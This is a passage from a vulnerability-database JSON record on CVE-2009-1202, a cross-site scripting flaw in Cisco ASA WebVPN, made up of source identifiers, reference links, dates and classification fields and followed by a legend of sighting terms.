      {
        "db": "PACKETSTORM",
        "id": "78856",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "db": "BID",
        "id": "35480"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "PACKETSTORM",
        "id": "78639"
      },
      {
        "db": "PACKETSTORM",
        "id": "78856"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "id": "VAR-200906-0069",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T13:30:20.297000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "18442",
        "trust": 0.8,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=18442"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/35480"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/archive/1/504516/100/0/threaded"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id?1022457"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/35511"
      },
      {
        "trust": 1.1,
        "url": "http://www.vupen.com/english/advisories/2009/1713"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1202"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-1202"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/504516/100/0/threaded"
      },
      {
        "trust": 0.4,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=18442"
      },
      {
        "trust": 0.3,
        "url": "http://www.cisco.com/en/us/products/ps6120/index.html"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/504516"
      },
      {
        "trust": 0.2,
        "url": "http://www.cisco.com/pcgi-bin/tablebuild.pl/asapsirt"
      },
      {
        "trust": 0.1,
        "url": "http://www.trustwave.com\""
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1202"
      },
      {
        "trust": 0.1,
        "url": "https://www.trustwave.com/spiderlabs"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1203"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1201"
      },
      {
        "trust": 0.1,
        "url": "http://www.cisco.com/security"
      },
      {
        "trust": 0.1,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "http://www.cisco.com)"
      },
      {
        "trust": 0.1,
        "url": "https://www.trustwave.com"
      },
      {
        "trust": 0.1,
        "url": "https://www.trustwave.com/spiderlabs/advisories/twsl2009-002.txt"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=18536"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/business_solutions/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/35511/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=18373"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "db": "BID",
        "id": "35480"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "PACKETSTORM",
        "id": "78639"
      },
      {
        "db": "PACKETSTORM",
        "id": "78856"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "db": "BID",
        "id": "35480"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "PACKETSTORM",
        "id": "78639"
      },
      {
        "db": "PACKETSTORM",
        "id": "78856"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2009-06-25T00:00:00",
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "date": "2009-06-24T00:00:00",
        "db": "BID",
        "id": "35480"
      },
      {
        "date": "2009-08-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "date": "2009-06-25T00:37:57",
        "db": "PACKETSTORM",
        "id": "78639"
      },
      {
        "date": "2009-07-01T09:39:17",
        "db": "PACKETSTORM",
        "id": "78856"
      },
      {
        "date": "2009-06-25T17:30:00.250000",
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "date": "2009-06-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-10T00:00:00",
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "date": "2009-06-26T13:59:00",
        "db": "BID",
        "id": "35480"
      },
      {
        "date": "2009-08-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "date": "2018-10-10T19:35:07.870000",
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "date": "2009-06-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco Adaptive Security Appliances (ASA) Device  WebVPN Vulnerable to cross-site scripting",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "xss",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "78639"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ],
    "trust": 0.7
  }
}


Sightings

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.